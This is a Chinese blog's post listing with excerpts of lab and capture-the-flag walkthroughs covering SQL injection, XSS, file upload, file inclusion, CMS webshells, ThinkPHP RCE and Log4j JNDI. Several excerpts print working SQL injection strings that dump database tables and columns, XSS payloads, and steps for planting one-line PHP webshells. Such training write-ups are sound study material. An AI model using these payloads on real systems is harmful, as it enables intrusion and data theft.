自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(41)
  • 收藏
  • 关注

原创 aspcms webshell漏洞复现

在抓取的数据包中修改 slideTextStatus 字段的值为以下代码并进行发包 访问影响文件。【ip】/admin_aspcms/login.asp访问后台,admin 123456登录。点击【扩展功能】【幻灯片设置】点击【保存】开启代理进行抓包。

2024-09-16 14:37:17 68

原创 dedecms靶场(四种webshell姿势)

点击【生成】【更新主页HTML】将主页位置修改为【./index.php】点击 【生成静态】点击 【更新主页HTML】 再次访问站点首页可发现变化..点击【模板】【默认模板管理】【index.htm】【修改】 在文件修改中添加一句话木马 保存。点击 【模块】 【广告管理】【增加一个新广告】在【广告内容】 处添加一句话木马点击 【确定】点击【系统】【sql命令行工具】写入一句话木马到网站目录下的1.php文件中,确定。一.登陆到后台点击【核心】【文件式管理器】【文件上传】将准备好的一句话木马上传。

2024-09-16 12:09:53 132

原创 seafaring靶场漏洞测试攻略

进入网页。

2024-09-13 20:59:49 308

原创 sqlgun靶场攻略

进入靶场界面输入框测试回显点-1'union select 1,2,3#看看有木有回显点查看数据库名-1'union select 1,2,database()#查看表名-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='sqlgunnews'#查看admin表中列名-1'union select 1,2,grou

2024-09-13 20:30:28 165

原创 Rickdiculously Easy靶场渗透测试

靶机下载地址。

2024-09-11 17:17:33 622

原创 【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现

【代码】【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现。

2024-09-07 12:47:12 758

原创 代码执行漏洞-Log4j2漏洞

action= 这⾥有个参数可以传,可以按照上⾯的原理 先构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload然后在DNSLOG 平台上那⾥留下记录,我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的 版本号!开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址.反弹Shell-base64加密。

2024-09-07 10:51:52 533

原创 中间件漏洞解析

lls6.x在网站根目录下编写一个一句话木马然后进行访问lls7.x配置环境将 cgi.fix_pathinfo=1 前面的封号取消掉...并重启...利用姿势拿蚁剑进行链接。

2024-09-05 18:13:42 640

原创 hackme靶机通关攻略

数据改为1*,复制数据包到1.txt,发到kali里面。MD5解密superadmin 密码。搜索一本书抓包发放到重放器。sqlmap查看当前数据库。访问uploads文件夹。查看users表中列。

2024-09-04 16:59:44 286

原创 文件包含PHP伪协议利用方法

⽤途:读取压缩包内的⽂件(绝对路径 / 相对路径)⽤途:读取压缩包内的⽂件(绝对路径 / 相对路径)使⽤: file:// ⽂件的绝对路径和⽂件名。cmd=php://input抓包。⽤途:数据( RFC2397 )⽤途:常⽤于读取⽂件 / 源码。

2024-09-04 15:45:11 261

原创 tomato靶机通关攻略

将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。找到一个/antibot_image/ 目录,进而找到/antibots/目录。在kali里面进行目录扫描,找到一个antibot_image。页面通过image传参查看passwd文件。用kali去扫描端口,发现有3个开放端口。页面通过image传参查看日志文件。发现可能存在文件包含。

2024-09-04 15:08:44 420

原创 pikachu文件包含漏洞靶场攻略

创建一个2.php文件,里面输入<?filename后面输入../../../../../1.php访问php文件。Allow_url_include=on //默认关闭。fileinclude目录下找到shell.php文件。allow_url_fopen=on //默认打开。访问php文件,连接。

2024-09-04 10:59:50 538

原创 sql-labs61-65关通关攻略

?id=1')) and updatexml(1,concat(1,(select database())),1)--+?id=1')) and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+?id=1')) and updatexml(1,concat(1,(select group_concat(column

2024-09-02 14:26:49 1149

原创 sql-labs56-60通关攻略

?id=-1')union select 1,2,database()--+?id=-1')union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+ ?id=-1')union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=

2024-09-02 11:31:23 1002

原创 sql-labs51-55通关攻略

1'and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) --+' and updatexml(1,concat(0x7e,(select group_concat(column

2024-08-30 17:36:52 1084

原创 upload-labs闯关攻略

提前准备好的一个PHP木马,然后将后缀名改为jpg上传然后在上传的过程中利用抓包,将抓取到的包里面的后缀jpg改为php如图所示,然后放行接着我们去访问上传的图片信息,如下图所示就为成功。

2024-08-30 17:35:55 916

原创 vulhub xxe靶机

进入robots.txt里面会发现俩个目录然后我们进去xxe里面。可以看到关于密码和用户名的是xml,那么就可以考虑用xxe注入。解码出来是/etc/.flag.php然后重新修改xml。将admin.php改为flagmeout.php。可以看到有很多乱码,然后进行base64解码。进入xxe页面进行登录,burp抓包。解码后发现还需要进行以此md5解码。先用御剑扫描出ip然后进入网页。然后编成php文件进行访问。进行base32解密。

2024-08-29 17:53:13 791

原创 sql-labs46-50通关攻略

四.查询user表中数据。四.查询user表中数据。

2024-08-29 15:19:48 1031

原创 xss-labs

进入16关页面输入<a%0dhref='javas%0acript:alert(1)'>xss然后点击xss。

2024-08-28 18:09:39 284

原创 sql-labs41-45关通关攻略

第43关第44关第45关。

2024-08-28 13:26:15 908

原创 xss-labs 11-15关通关攻略

发现有cook值,在这里注入Referer:"onclick="alert(1)"type="text。在抓到的数据包中加入Referer:"onclick="alert(1)"type="text。二.在ua头注入 Referer:"onclick="alert(1)"type="text。点击f12 在图片标签里添加一个点击事件 οnclick='alert(1)'进入第12关发现没有注入点,进入源代码看哪里可以注入发现。src='./level1.php'文件。进如第13关,发现没有注入点。

2024-08-27 19:33:51 149

原创 sql-labs36-40通关攻略

id=-1%df%27%20union%20select%201,group_concat(id,username,0x3a,password),3%20from%20users--+进入重放器uname=-1%df' union select database(),2#&passwd=1&submit=Submitid=1%27--+id=1--+

2024-08-27 18:22:50 1234

原创 cthub-ssrf通关攻略

然后就进来页面了。

2024-08-27 15:55:11 797

原创 sql-labs31-35关通关攻略

1“”

2024-08-26 18:23:35 988

原创 xss-labs靶场6-10关

没有输入的地方,就在URL中,尝试将隐藏标签显示出来。将javascript:alert(1)进行编码后。将javascript:alert(1)进行编码。使用a标签,发现a标签可以。后面再加上//http://然后将编码输入再次点击链接。点击一下输入框,完成。

2024-08-26 17:42:26 366

原创 xss-labs1-5关通关攻略

点击图片进入第一关。

2024-08-25 09:41:32 564

原创 sqli-labsSQL手工注入第26-30关

http://127.0.0.1/Less-26/?id=11%27%26extractvalue(1,concat(%27~%27,database(),%27~%27))%261=%27http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=%27security%27))),1

2024-08-24 20:25:28 1202

原创 sqlilabs less21-25关手工注入

使用二次注入 http://127.0.0.1/Less-25/?

2024-08-22 21:31:11 1079

原创 pikachu-Cross-Site Scripting通过攻略

反射型xss(get)第一步:进入先将maxlength中的20修改大一些,以便我们可以输入更多的字符第二步:输入<script>alert(1)</script>成功爆破反射型xss(post)第一步:点击提示得到用户名和密码登录第二步:输入<script>alert(1)</script>成功爆破存储型xss在留言框里输入<script>alert(1)</script>成功爆

2024-08-22 17:39:38 354

原创 sqlilabs less16-20关手工注入

闭合方式点“)

2024-08-21 18:14:43 1098

原创 Oracle⼿⼯注⼊

此次靶场地址为:墨者学院。

2024-08-20 19:13:01 605

原创 SQL手工注入漏洞测试(MongoDB数据库)

可以在此来显示想要查询的数据。通过回显观察到数据库为 mozhe_cms_Authority 其中tojson是可以把数据变成 json型数据,db为取当前数据库,即当前的数据库为 mozhe_cms_Authority。五.最终我们就可以获得数据了,将密码进⾏MD5解密,返回登录⻚进⾏登录,划倒⻚⾯最下 端就可以看到KEY了。三.得到数据库名之后就可以尝试爆出数据库下的表名了且构造Payload...其中db.getColl ectionNames() 返回⼀个包含当前数据库中所有集合名称的数组。

2024-08-20 18:40:55 729

原创 SQL手工注入漏洞测试(PostgreSQL数据库)

http:// new_list.php?id=1 and 1=2http:// new_list.php?id=1 and 1=2http://new_list.php?id=1 order by 4http://new_list.php?id=1 order by 4http://new_list.php?id=1 order by 5http://new_list.php?id=1 order by 5 http://new_list.php?id=1 and 1=2 union select 'nu

2024-08-20 17:24:09 1192

原创 MSSQLILABS靶场手工注入

having 1=1- 'group by 字段名 1 ,字段名 2--+'having 1=1- 'group by 字段名 1--+注入点为1',如下图所示,可知数据类型为字符型。第五张表返回值为空,说明只有四张表。

2024-08-20 16:56:37 882

原创 ASSESS手工注入(附搭建教程)

进入资源库里面可以找到靶场搭建环境。

2024-08-20 12:01:03 715

原创 Vulnhub靶机:AI-WEB-1.0

sqlmap -r '/home/kali/桌面/1.txt' -D aiweb1 -T user --columns --dump --batch。$ sqlmap -u'/home/kali/桌面/1.txt' -D information_schema --tables --batch。$ sqlmap -r '/home/kali/桌面/1.txt' -D aiweb1 -T user --columns --batch。2.利用burp抓包进行注入。5.查user表中所有数据。

2024-08-19 17:43:20 382

原创 sqli-labspage第十一关到第十五关

闭合点为1'

2024-08-18 20:25:14 680

原创 sql手工注入——sqli-labspage第六关到第十关

判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115。说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'说明users表的第一个字段的第一位字符ascii码为105 'i'

2024-08-18 18:11:50 1338

原创 sql手工注入——sqli-labspage第二关到第五关

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面显示正常 说明数据库第一位字符ascii码大于114。判断数据库第一位字符的ascii码是否大于115 页面显示异常 说明不大于 大于114不大于115 说明第一位字符ascii码等于115。我们可以操控的是第二个参数的位置所以第二个参数的位置换成concat()函数,这个函数也有两个参数,写两个1占位置。说明数据库第二位字符的ascii码长度大于100不大于101 那么就是等于101 'e'以上步骤重复会得出最终答案。

2024-08-15 22:19:51 1170

原创 sql手工注入---sqli-labs-master靶场第一关

例如:以下链接id=id=

2024-08-14 21:22:03 896

ASSESS手工注入(附搭建教程)

靶场环境

2024-08-20

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除